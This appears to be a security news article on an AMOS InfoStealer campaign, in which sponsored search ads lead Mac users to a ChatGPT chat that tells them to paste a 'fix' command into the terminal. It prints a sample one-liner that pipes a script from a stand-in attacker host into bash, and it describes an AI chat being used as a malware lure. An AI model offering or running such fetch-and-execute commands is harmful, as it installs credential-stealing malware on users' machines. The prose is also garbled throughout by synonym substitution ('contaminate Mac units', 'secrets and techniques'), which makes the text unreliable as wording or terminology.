A brand new AMOS InfoStealer marketing campaign is abusing belief in ChatGPT to contaminate Mac units underneath the guise of straightforward troubleshooting assist.
Victims seek for a repair to a sound downside, click on a sponsored ChatGPT consequence, and are proven what seems like a traditional chat session.
The chat then returns a “restore” command and tells the consumer to run it within the macOS terminal.
Google Chrome Looking Historical past extract from contaminated Mac gadget (Supply – KROLL)Google Chrome Looking Historical past extract from contaminated Mac gadget (Supply – KROLL)
The assault blends social engineering and technical abuse in a method that feels routine to customers. There isn’t a faux installer window or apparent phishing web page.
As an alternative, the sufferer follows what seems to be a traditional assist stream in a widely known AI chat interface. KROLL safety researchers recognized that this stream was used to deploy AMOS InfoStealer on focused Mac endpoints.
The KROLL crew detected that the lure is pushed utilizing Google Advertisements, which place the malicious ChatGPT session on the high of search outcomes. The area proven is reputable, which makes it even tougher for a standard consumer to identify the danger.
As soon as the consumer trusts the chat, a single copy‑paste operation within the terminal is adequate to compromise the system.
ChatGPT Directions proven to the consumer (Supply – KROLL)
The affect is critical for each house customers and corporations. AMOS InfoStealer is constructed to reap browser information, credentials, session cookies, and different saved secrets and techniques from the contaminated Mac.
Stolen information can then be reused for account takeover, lateral motion, or sale on underground markets.
An infection Mechanism and Malicious Command Execution
KROLL analysts traced the preliminary an infection to a terminal command given by the faux ChatGPT chat, which acts as an indicator of compromise.
The command tells macOS to obtain and run a distant script, a sample that aligns with MITRE ATT&CK strategies for consumer execution and ingress device switch.
A typical malicious sample seems like:-
curl -s https://attacker-example[.]com/installer.sh | bash
When executed, this one‑line command pulls a shell script over HTTPS, saves nothing seen to the consumer, and runs the script in the identical terminal session. The script can then set up AMOS, arrange persistence, and begin information theft.
Comply with us on Google Information, LinkedIn, and X to Get Extra Instantaneous Updates, Set CSN as a Most well-liked Supply in Google.
